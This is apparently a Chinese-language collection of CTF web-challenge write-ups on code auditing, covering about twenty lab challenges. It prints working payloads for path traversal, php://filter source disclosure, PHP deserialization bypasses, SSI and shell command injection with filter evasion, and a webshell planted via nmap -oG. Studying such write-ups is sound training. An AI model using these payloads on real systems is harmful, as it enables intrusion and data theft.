WEB专项-代码审计(一）

一、WarmUP

1.进入靶场，出现一张照片，右击查看源代码，发现有一个注释的source.php文件

2.访问source.php，发现白名单中还存在hint.php文件，继续访问hint.php文件，发现有flag的线索。


3.接下来就是想办法绕过source.php中的防护，传参file必须要满足三个条件，第一个不能为空，第二个是字符串，第三个得满足函数checkfile的判断，这里面关键是要通过checkfile 的判段。第一个if函数如果参数为空或者非字符串则错误；第二个if函数搜索参数是否符合白名单中的值，需要完全相同，故该函数不可能成立；mb_substr函数对参数进行分割；第三个if函数判断分割后的参数是否在白名单内，然后对参数进行url解码，防止编码绕过。综合上述条件：payload为?file=source.php%3f/../../../../ffffllllaaaagggg，获得flag。

二、HaveFun

1.进入靶场，查看源代码，发现有一段代码被注释了。

2.只要传入的参数cat满足判断即可获得flag。

三、Secret File

1.一进靶场，出现以下画面，查看源代码，发现一个Archive_room.php页面，去访问它。

2.进入Archive_room.php页面，继续查看源代码，发现一个action.php页面。

3.继续点击action.php进入下一个页面，但是发现进入的却是end.php页面。

4.这就得用burpsuite去抓包分析了，为啥没进入action.php页面。抓到action.php的相应包，发现还隐藏着一个secr3t.php页面。

5.访问secr3t.php页面，出现如下画面。

6.接下来就是如何绕过if判断获得flag了。strstr函数搜索字符串在另一字符串中是否存在，如果是，返回该字符串及剩余部分，否则返回 FALSE；stristr() 函数搜索字符串在另一字符串中的第一次出现。直接构造file=flag.php，发现还是没法得到。

7.尝试将flag.php进行base64编码后再输出。构造payload：file=php://filter/convert.base64-encode/resource=flag.php。

8.对显示的字符串进行base64解码即可获得flag。

四、Http1

1.进入页面查看源代码，发现有一个小文件。

2.访问该页面，出现如下画面，说它不可能来自https://Sycsecret.buuoj.cn 。

3.直接去访问该网站，发现果然连接失败。

4.那只能用burp来修改数据包了，将referer改为https://Sycsecret.buuoj.cn ，放包，页面出现新信息。


5.提示我们用Syclover浏览器，继续修改数据包，将user-agent改为Syclover，放包，页面出现新信息。


6.提示我们要在本地访问，继续修改数据包，将X-Forwarded-For设为127.0.0.1，放包，得到flag。

五、PHP1

1.打开靶场，查看页面源代码，没有发现什么线索。

2.根据页面提示，有备份的习惯，猜测应该有源码，尝试用目录扫描工具，结果真的存在源码，下载源码。

3.依次打开三个php文件，有一个flag.php文件，打开，发现里面有一个flag，尝试提交，不对。

4.再去看class.php和index.php文件，发现了线索。index.php有一个反序列化函数，class.php有输出flag的代码。当传递的username为admin时会显示flag，但要求传递的参数为select，故得通过反序列化去实现。

5.当password不等于100的时候，程序会走到die()就结束了，故得把password设为100，username设为admin，在进行序列化操作。

6.得到序列化后的结果，进行传参。

7.发现没成功，那应该还是传参有问题。仔细检查，发现还有个wakeup函数会将username设为guest，故得绕过该函数。序列化后的结果O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}发现Nameusername和Namepassword与前面的14不对应，少了两个字符，这是因为username和password变量是private类型，变量中的类名前后会有空白符，而复制的时候会丢失，所以还需要加上%00，同时要绕过_wakeup()，还要将Name后面的数字修改为大于2的数。

8.将传参改为O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}，成功得到flag。

六、Easy Calc

1.打开靶场，实现的是一个计算器的功能，查看页面源代码，发现此功能是由calc.php页面实现的。

2.访问calc.php页面，发现是一个黑名单判断，尝试输入参数num=phpinfo();发现被waf拦截了。


3.不能输入num，那就尝试使用%20num进行绕过，果然成功了。

4.通过php的scandir函数查看该目录下存在什么文件，这里/被过滤了，尝试用ascll码进行转换，命令%20num=var_dump(scandir(chr(47)));有发现。

5.目录里有一个f1agg的文件，用file_get_contents函数去读取，获取flag。命令%20num=var_dump(file_get_contents(chr(47).f1agg));。

七、BackupFile1

1.打开靶场，根据题目和页面的提示，猜想应该是有备份文件，用御剑扫描后发现存在index.php.bak文件。

2.打开index.php.bak文件，里面的php代码较简单，简单的构造一个payload：key=123即可绕过。

八、BuyFlag1

1.进入靶场，右击查看源代码，看到有两个php文件，经过查看，index.php里面没东西,pay.php里面有东西。

2.pay.php里面有这样一段代码，要求用POST的方式传参money和password。

3.构造参数password=404a&money=100000000，也没有回显。

4.经过抓包，发现传递的参数里面的cookie值为0，将其改为1，继续传参。

5.提示我传参的数据太长了，肯定是我的money传参位数太多了，将其改为科学计数法money=1e9，再进行尝试，成功。

九、NiZhuanSiWei1

1.打开靶场，是一段源码。

2.其中isset判断text是否为空，还有text文件中读取一串字符串要跟welcome to the zjctf相等，这里采用data协议进行读取，构造payload：?text=data://text/plain,welcome to the zjctf。

data写入协议详见https://www.kancloud.cn/a173512/php_note/1709823
3.file参数中不能包含flag，其根据提示存在useless.php，所以采用php://filter协议进行读取，如果不采用，代码会被和谐掉。构造payload：?file=php://filter/read=convert.base64-encode/resource=useless.php。

4.最后一步就是序列化password，这里直接采用模板。

<?php  
class Flag{  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

这里最后会echo输出$file
将flag.php的值给了$file,然后反序列化。

<?php 
class Flag{   
    public $file="flag.php"; 
    public function __tostring(){ 
        if(isset($this->file)){ 
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        } 
    } 
} 
$password=new Flag();
echo serialize($password);
?>

5.将序列化后的结果赋给password即可，最后重新构造payload：?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}，查看源代码即可获得flag。

十、Ez_bypass

1.进入靶场，查看源代码。

2.关键的代码是上述框里的，首先两个get传参id和gg的md5值要相等，但是id和gg不相等，一个post传参passwd不能是数字且其要弱类型等于1234567.
要使id和gg的md5值相等但他们两个不相等可以通过数组实现，passwd不能是数字但要等于1234567可以在1234567后加个a即可。

总结：
MD5绕过的几种手法：
（1）$a!=$b;md5($a)==md5($b);
这种情况可以通过几个md5值开头是0e的字符串进行绕过，如下图

（2）$a!=$b;md5($a)===md5($b);
这种情况可以传数组进行绕过，如下图

（3）(string)$a!=(string)$b;md5($a)===md5($b);
这个只能通过MD5碰撞，可参考https://www.jianshu.com/p/c9089fd5b1ba
（4）$a=$_GET[‘a’];$a==md5($a);
这个只能让$a是以0e开头的，且其的md5值也是以0e开头。例如：$a=’0e215962017’或者$a=’0e00275209979’，如下图


有一题有这样三个条件：传参是一个数组$a；检查$a[0]和$a[1]，很严格的过滤；取$a数组的前两个元素做拼接，执行危险命令，如何绕过？
绕过方法：?a[2]=危险语句&a[3]=危险语句&a[0]=正常语句&a[1]=正常语句

十一、[BJDCTF2020]EasySearch

1.随便输入两个数据，看页面回显。

2.查看页面源代码，发现[!]Failed一直存在于前端代码中，无法绕过。

3.猜想可能存在其他文件，进行目录扫描，发现了index.php.swp文件。

4.查看index.php.swp文件。

5.只需要让password的md5值的前6位等于6d0bc1即可。

import hashlib

for i in range(1000000000):
    md5 = hashlib.md5(str(i).encode('utf-8')).hexdigest()
    if md5[0:6] == '6d0bc1':
        print(str(i)+' | '+md5)

输入username=123，password=2020666，回显如下。

6.代码中还生成了.shtml文件，文件名是get_hash()函数生成的，往该文件写入了内容。由于get_hash()函数每次生成的值都不一样，尝试用抓包去分析，在响应包中看到了文件。

7.访问该文件，用户名输出，猜想可以在用户名处进行注入。

8.此处为ssi注入，ssi可以赋予html静态页面的动态效果，通过ssi执行命令，返回对应的结果。命令格式为：<!--#exec cmd=”命令” -->。首先查看当前目录下的文件。



9.没有发现flag，查看根目录下的文件。



10.用cat命令读取flag文件。

十二、[0CTF2016]piapiapia

1.尝试sql注入，没成功。


2.查看源代码也没有发现。进行目录扫描，存在一个www.zip压缩包，里面有6个php文件。

3.进行代码审计。
（1）config.php
config.php文件里面有变量flag，所以大概率存在于服务器的config.php文件中。

（2）class.php
class.php文件定义了mysql类和user类，filter方法将select、where、insert等关键字都替换成了hacker，update_profile方法调用了filter方法。


（3）update.php
update.php文件对phone，email，nickname的传参都进行了正则匹配，然后将其序列化后进行上传。

（4）profile.php
profile.php文件将用户信息反序列化，对photo的内容用base64编码进行读取和显示。

4.想让flag显示出来就得依靠base64-encode(file_get_contents($profile['photo']))，让photo的传参为config.php。所以这里采用的是php反序列化字符逃逸，需要构造出超出长度的数据，将被挤出来的数据形成可以读取config.php的数据项。
（1）构造数据
构造数据要被挤到photo的位置，需要在nickname的位置构造超出规定长度的数据，由于对nickname的长度限制为小于等于10，这里要将其改为数组绕过。

（2）读config.php的数据，加上对前面符号的闭合的字符串，长34位：";}s:5:"photo";s:10:"config.php";}，即需要在nickname处多添加34位长的数据。
（3）在filter进行过滤的时候，where、select等关键词会被替换成hacker，当nickname传入34个where的时候，就会多出34个字符的长度。所以nickname的传参为：wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}。
5.先进行注册，按照顺序进入update.php页面。



6.在update.php页面进行抓包，修改数据放包。

7.查看页面源代码，对其进行base64解密即可。

十三、[MRCTF2020]套娃

1.右键查看源代码。

2.要求传入的参数不能有下划线，且传入的值不能等于23333，但是得以2开头，3结尾。第一个绕过通过把下划线换成空格，第二个绕过通过换行符实现。

3.访问secrettw.php，源代码中有JSFuck密码，控制台输出。


4.提示传参方式为POST，传参为Merak，要从本地访问。


5.源代码中要绕过第一个if判断，X-Forwarded-For无法绕过，换成Client-IP绕过；file_get_contents读取到的内容为today is a happy day，可以利用data协议；change($_GET['file'])的值为flag.php。

十四、dino3d

1.玩游戏过程中进行抓包，发现有check.php。

2.回显是分数不到1000000分，修改score传参为1000000，回显如下。

3.查看页面源代码，寻找有关check.php的东西，在build.min.js中找到。

4.两个传参跟e有关，一个跟时间相关。第一个score=1000000，第二个是分数+t的md5值，第三个tm是时间戳。要设置第二个参数，得先知道t是什么，追踪代码。



5.所以t=DASxCBCTF_wElc03e，这样就可以得到checkCode的值。

6.编写脚本跑出flag。

import requests
import hashlib
import time

my_url = "http://node4.buuoj.cn:26195//check.php"
my_headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
    "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.9",
    "Accept-Encoding": "gzip, deflate", "Referer": "http://node4.buuoj.cn:26195/",
    "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Origin": "http://node4.buuoj.cn:26195", "Connection": "close"}
score = "1000000".encode()
checkcode = hashlib.md5(score + 'DASxCBCTF_wElc03e'.encode()).hexdigest()
timestamp = int(time.time())
my_data = {"score": score, "checkCode": checkcode, "tm": timestamp}
resp = requests.post(url=my_url, headers=my_headers, data=my_data)
print(resp.text)

十五、NotPHP

1.源码如下。

2.绕过第一个if判断，可以通过data协议，payload：data=data:/text/plain,Welcome to CTF。

3.绕过第二个if判断可以通过传数组，payload：key1[]=abc&key2[]=def

4.绕过第三个if判断可以通过数字后面加字母实现，payload：num=2077a

5.最后就是绕过那个#注释，让其执行命令。尝试过用分号结尾或者转义字符去绕过，但是都不行。最后只能用?>来结束上一段php代码，再另写一段php代码去执行system('cat /flag')命令，成功。

十六、Online Tool

1.网页代码如下。

2.这里能利用的点只有最后一行的system命令中的host变量。host首先是通过GET传参，并且经过escapeshellarg和escapeshellcmd两个函数的转换获得。先了解两个函数的功能。


两个函数一起使用会产生如下的漏洞。

3.利用以上的特性，结合nmap命令的-oG参数可以将命令和结果写进文件，所以这里可以尝试往一个文件里面写一句话木马。构造payload：?host='<?php eval($_REQUEST[8]) ?> -oG 666.php'。

4.得到了上传文件的地址，成功访问。

5.使用菜刀连接，获得flag。

十七、ZJCTF，不过如此1

1.源码如下。

2.关键点如上，绕过第一个if判断可以data协议进行传入，根据提示next.php，可用base64加密过后显示该页面源码。

3.得到一串base64加密后的字符串，进行解密，得到php代码。

4.进行代码审计。可通过getFlag函数传递cmd参数获得flag。preg_replace()函数中的/e参数会产生命令执行漏洞，可以将第二个参数当作命令执行，但是这里第二个参数已经被写死了，strtolower中的\1相当于\1，在正则匹配中代表第一个子匹配项。例如payload为/?.*={${phpinfo()}}，当经过正则替换后就变成 preg_replace('/(.*)/ei', 'strtolower("\1")', {${phpinfo()}});但是该语句不能执行phpinfo命令，因为$_GET会将不合法的参数转换为下划线，故传入的变量可以是\S*。

十八、Had a bad day?

1.页面上有两个按钮，点击查看能不能发现什么线索。



2.尝试着从catagory参数中将两个页面的源代码读出来。


3.两者得到的源码一致，用base64进行解码。

4.发现是img的标签，没有用。尝试着去读取index.php的源码，注意这里resource=index。

5.跟做题有关的代码如下。

6.只有当匹配到woofers、meowers、index三者当中的任意一个关键字才会显示。所以要去访问flag也得利用上面的关键字。构造payload：?category=php://filter/read=convert.base64-encode/resource=index/../flag

7.解码得到flag。

十九、Mark loves cat1

1.页面中没有任何的注入点，尝试过在contact界面进行XSS没成功。查看源码也没有任何的信息。


2.目录扫描后发现.git泄露，利用GitHack.py进行下载，得到flag.php和index.php文件。


3.第一个foreach将POST的传参进行键值分离，第二个foreach将GET的传参进行键值分离，不同的是第一个的值是$y，第二个是$$y，所以这里存在变量覆盖漏洞。存在三个exit函数可以输出flag。
（1）exit($handsome)
要满足的条件是$_GET['flag'] === $x && $x !== 'flag'，故构造payload：?handsome=flag&flag=b&b=flag。

（2）exit($yds)
要满足的条件是!isset($_GET['flag']) && !isset($_POST['flag'])，构造payload：?yds=flag。

（3）exit($is)
要满足的条件是$_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'，构造payload：?is=flag&flag=flag。

二十、安洵杯easy_web1

1.url中存在两个参数img和cmd，且img的值像是一个base64加密，故将其进行解密。



2.按照这个规律，index.php进行一次16进制转换，两次base64加密。


3.可以看到页面左上角有一张没显示的照片，右击查看源代码。

4.将其进行base64解码可得到php代码。

5.代码中对cmd传参和file传参都做了过滤，可利用的点是`$cmd`，反引号是shell_exec的别称，故想代码执行到此处，得满足下述代码。

6.绕过正则匹配可用\，而a和b的传参不能用数组进行绕过，因为都将其转换成了string类型，所以只能采取md5碰撞的策略，故payload：

$a = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&$b= %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2，cmd=dir

7.可以看到该目录下有4个文件，没有看到有flag，所以去查看根目录，payload：cmd=l\s%20/。

8.去查看flag，payload：cmd=c\a\t%20/flag。

二十一、高明的黑客。

1.页面提示存在网页源代码备份，进行下载。

2.源代码中包含了3000多个php文件，进行代码审计，利用Seay审计工具进行自动审计功能，发现了许多漏洞。

3.尝试了几个之后，发现有许多地方都无法得到flag。


4.利用大佬写的脚本爆破之后，才得到可利用的点在xk0SzyKwfzw.php文件中，只要在Efa5BVG传参中传入我们想要的执行命令即可。

import os
import requests
import re
import threading
import time

print('开始时间：  ' + time.asctime(time.localtime(time.time())))
s1 = threading.Semaphore(30)  # 这儿设置最大的线程数
filePath = r"D:\phpStudy\PHPTutorial\WWW\src"
os.chdir(filePath)  # 改变当前的路径
requests.adapters.DEFAULT_RETRIES = 5  # 设置重连次数，防止线程数过高，断开连接
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False  # 设置连接活跃状态为False


def get_content(file):
    s1.acquire()
    print('trying   ' + file + '     ' + time.asctime(time.localtime(time.time())))
    with open(file, encoding='utf-8') as f:  # 打开php文件，提取所有的$_GET和$_POST的参数
        gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
        posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    data = {}  # 所有的$_POST
    params = {}  # 所有的$_GET
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
    url = 'http://127.0.0.1/src/' + file
    req = session.post(url, data=data, params=params)  # 一次性请求所有的GET和POST
    req.close()  # 关闭请求  释放内存
    time.sleep(2)
    req.encoding = 'utf-8'
    content = req.text
    # print(content)
    if "xxxxxx" in content:  # 如果发现有可以利用的参数，继续筛选出具体的参数
        flag = 0
        for a in gets:
            req = session.get(url + '?%s=' % a + "echo 'xxxxxx';")
            content = req.text
            req.close()  # 关闭请求  释放内存
            time.sleep(2)
            if "xxxxxx" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b: "echo 'xxxxxx';"})
                content = req.text
                req.close()  # 关闭请求  释放内存
                time.sleep(2)
                if "xxxxxx" in content:
                    break
        if flag == 1:  # flag用来判断参数是GET还是POST，如果是GET，flag==1，则b未定义；如果是POST，flag为0，
            param = a
        else:
            param = b
        print('找到了利用文件： ' + file + "  and 找到了利用的参数：%s" % param)
        print('结束时间：  ' + time.asctime(time.localtime(time.time())))
    s1.release()


for i in files:  # 加入多线程
    t = threading.Thread(target=get_content, args=(i,))
    t.start()

二十二、朴实无华

1.先尝试抓包，看在请求头中有没有什么线索。

2.没有发现后，尝试去访问robots.txt文件了解爬虫的规则。

3.根据提示访问fAke_f1agggg.php文件。

4.在页面中无任何提示，但当查看请求头的时候发现了线索。

5.访问该文件出现了php代码。

6.代码中乱码，修改编码展示正常，跟获取flag相关的代码如下。

7.对于第一个if判断，可用科学计数法进行绕过。payload：num=11e3。

8.对于第二个if判断，只是一个md5的弱比较，采用0e开头的即可。payload：md5=0e215962017。

9.对于第三个if判断，其对cat关键字进行了替换，还对空格进行了过滤。空格可用$IFS$9进行替代，cat命令可用tac命令进行替代。payload：get_flag=tac$IFS$9fl4g.php。

10.成功绕过，再使用ls命令去查看flag藏在哪里。

11.访问对应文件即可。payload：get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag。